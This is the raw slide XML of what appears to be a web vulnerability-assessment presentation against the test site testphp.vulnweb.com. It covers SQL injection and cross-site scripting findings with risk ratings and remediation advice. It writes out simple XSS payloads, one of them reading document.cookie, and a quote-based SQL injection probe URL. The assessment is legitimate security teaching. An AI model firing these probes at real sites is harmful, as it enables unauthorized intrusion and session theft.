                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>An attacker may exploit this flaw to bypass authentication, read confidential data, modify the remote database, or even take control of the remote operating system.</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36875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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1452875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>We recommend to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>modify the CGIs so that they properly escape arguments.</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294" name="Google Shape;294;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7254240" y="2978331"/>
            <a:ext cx="426720" cy="450669"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF00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295" name="Google Shape;295;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9292046" y="2978331"/>
            <a:ext cx="426720" cy="450669"/>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296" name="Google Shape;296;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10877006" y="2978331"/>
            <a:ext cx="539931" cy="450669"/>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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539496" y="874776"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>CGI Generic SQL Injection (2nd pass)</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="302" name="Google Shape;302;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="296091" y="1741714"/>
            <a:ext cx="11599818" cy="4863521"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303" name="Google Shape;303;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="670560" y="1330190"/>
            <a:ext cx="4267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VULNERABILITY TEST RESULTS:</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk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4"/>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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="309" name="Google Shape;309;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="521207" y="1453226"/>
            <a:ext cx="10251296" cy="51918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5"/>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rPr lang="en-US"/>
              <a:t>14. Cross site Scripting XSS risk</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="315" name="Google Shape;315;p35"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="274320" y="1435608"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11663675"/>
              </a:tblGrid>
              <a:tr h="423675">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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1117600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>The javascripts command or query run in the input box are executed.</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47050">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>                         HIGH                 MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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1168400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.</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36875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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1452875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>We recommend to filter the user input as strictly as possible based on what is valid input. We also recommend to use the “Content-Type” and “X-Content-Type-Options” headers to ensure the browsers interpret the responses the way you intend.</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316" name="Google Shape;316;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6801394" y="2952206"/>
            <a:ext cx="496389" cy="476794"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF00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317" name="Google Shape;317;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8734697" y="2952206"/>
            <a:ext cx="496389" cy="47679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318" name="Google Shape;318;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10415450" y="2952206"/>
            <a:ext cx="496389" cy="47679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6"/>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rPr lang="en-US"/>
              <a:t>OUTPUT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324" name="Google Shape;324;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="809897" y="1489166"/>
            <a:ext cx="668818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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>Using the javascript:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>&lt;script&gt;alert(“Hello”)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="325" name="Google Shape;325;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1124195" y="2721193"/>
            <a:ext cx="7315201" cy="323333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7"/>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rPr lang="en-US"/>
              <a:t>OUTPUT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="331" name="Google Shape;331;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539496" y="1435608"/>
            <a:ext cx="6064504" cy="3977640"/>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Clr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Using the javascript:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="332" name="Google Shape;332;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="622082" y="2993860"/>
            <a:ext cx="9074331" cy="310204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8"/>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rPr lang="en-US"/>
              <a:t>15. SQL INJECTION RISK</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="338" name="Google Shape;338;p38"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="275771" y="1241616"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11640450"/>
              </a:tblGrid>
              <a:tr h="250125">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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1375675">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>We observed that a sql query can be entered in the input box of the website by the user and the query gets executed which affects the predefined sql commands.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                      </a:br>
                      <a:br>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                      </a:b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50125">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                                </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>             HIGH                 MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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812900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>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50125">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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1188100">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>We recommend to define all the sql codes involved with queries and limiting the use of special characters. We also recommend to consistently patch and update all the web application software components, plugins and web server software.</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr b="0" i="0" sz="1800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="Quattrocento Sans"/>
                        <a:ea typeface="Quattrocento Sans"/>
                        <a:cs typeface="Quattrocento Sans"/>
                        <a:sym typeface="Quattrocento Sans"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr b="0" i="0" sz="1800">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="Quattrocento Sans"/>
                        <a:ea typeface="Quattrocento Sans"/>
                        <a:cs typeface="Quattrocento Sans"/>
                        <a:sym typeface="Quattrocento Sans"/>
                      </a:endParaRPr>
                    </a:p>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339" name="Google Shape;339;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6557554" y="2960914"/>
            <a:ext cx="548640" cy="391886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF00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340" name="Google Shape;340;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8471989" y="2952205"/>
            <a:ext cx="548640" cy="391886"/>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341" name="Google Shape;341;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10194108" y="2960914"/>
            <a:ext cx="548640" cy="391886"/>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9"/>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rPr lang="en-US"/>
              <a:t>INPUT AND RESULT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347" name="Google Shape;347;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="43934"/>
            <a:ext cx="184731" cy="369332"/>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chemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="348" name="Google Shape;348;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="592183" y="1288869"/>
            <a:ext cx="9910354" cy="123110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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>Using the query:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/product.php?cat=1'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="2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349" name="Google Shape;349;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="592183" y="3860972"/>
            <a:ext cx="9413966"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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>Result: Error occurs due to wrong sql query. This indicates the site is prone to sql injection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4"/>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rPr lang="en-US"/>
              <a:t>OVERVIEW</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Google Shape;79;p4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539496" y="1435608"/>
            <a:ext cx="11398504" cy="5046472"/>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Clr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>TARGET: testphp.vulnweb.com</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
